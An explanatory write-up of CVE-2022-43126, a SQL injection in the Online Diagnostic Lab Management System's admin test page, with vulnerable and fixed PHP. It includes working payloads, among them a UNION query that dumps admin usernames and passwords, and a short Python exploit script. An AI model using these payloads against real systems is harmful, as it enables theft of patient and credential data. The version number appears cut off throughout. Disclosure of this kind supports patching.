On October 29, 2022, the security community identified a critical SQL Injection vulnerability in the Online Diagnostic Lab Management System v1.. Cataloged as CVE-2022-43126, this bug allows attackers to access or manipulate the backend database using a specially crafted request. In plain terms, this means someone could see sensitive data, change information, or even erase records just by tricking the app into running malicious SQL code.
In this long read, we'll break down how the vulnerability works, see example code, offer some references, and show how an attacker might exploit it—all in easy-to-read English.
What Is the Online Diagnostic Lab Management System?
The Online Diagnostic Lab Management System is a popular web-based platform that lets medical labs manage patient records, tests, results, and more. Version v1. is used by many small health centers for daily operations.
Where Is the SQL Vulnerability?
The problem lies in the way the application handles the id parameter in the admin dashboard, specifically at:
/admin/tests/manage_test.php?id=[USER_INPUT]
Instead of safely handling user input, the application takes whatever is passed as an id and includes it directly in an SQL query. If an attacker puts in extra data or SQL commands, the database will try to run them.
Let’s take a look at what the vulnerable code may look like (simplified for clarity)
<?php
// Vulnerable Code Example
$id = $_GET['id']; // No input validation!
$query = "SELECT * FROM tests WHERE id = $id"; // UNSECURE!
$result = mysqli_query($conn, $query);
?>
None of this input is sanitized or protected. If someone enters 1 OR 1=1 as their id, the whole table is returned.
How the Exploit Works
Let's imagine an attacker wants to pull all test records from the database. Instead of sending a normal request like:
/admin/tests/manage_test.php?id=2
They send
/admin/tests/manage_test.php?id=1 OR 1=1
So the query becomes
SELECT * FROM tests WHERE id = 1 OR 1=1
Since 1=1 is always true, this returns all records from the tests table.
Extracting Data
Attackers can also try to list database users, extract sensitive info, or even dump the whole database if error messages are shown or output is reflected.
Example of UNION-based injection to dump admin usernames
/admin/tests/manage_test.php?id=-1 UNION SELECT 1, username, password FROM admin_users--
A Sample Exploit Script
Here’s a simple Python script using the requests library to exploit this vulnerability and extract data:
import requests
url = "http://victim-website.com/admin/tests/manage_test.php";
payload = "1 OR 1=1"
full_url = f"{url}?id={payload}"
r = requests.get(full_url)
if "test record" in r.text: # Adjust for known response content
print("[!] Successfully exploited, page contains:")
print(r.text)
else:
print("[!] May not be vulnerable or payload needs tweaking.")
Responsible Disclosure
This vulnerability was publicly disclosed and assigned CVE-2022-43126. It was reported on various vulnerability trackers:
- Mitre CVE Entry
- Exploit Database Reference
- NVD Details
If you run this software, apply patches or contact the vendor for fixes.
Use prepared statements / parameterized queries
<?php
// Secure Code Example
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM tests WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
?>
Or, at the very least, validate and sanitize all user inputs.
Conclusion
CVE-2022-43126 is an example of how skipping basic security practices can lead to big risks. If you use Online Diagnostic Lab Management System v1., please update or patch your application, and always protect your database from untrusted input. Stay safe!
References
- Mitre CVE Entry
- Exploit-DB #51205
- NVD CVE Details
- OWASP SQL Injection
If you need help securing your systems, always reach out to a qualified professional.
Timeline
Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 23:33:00 UTC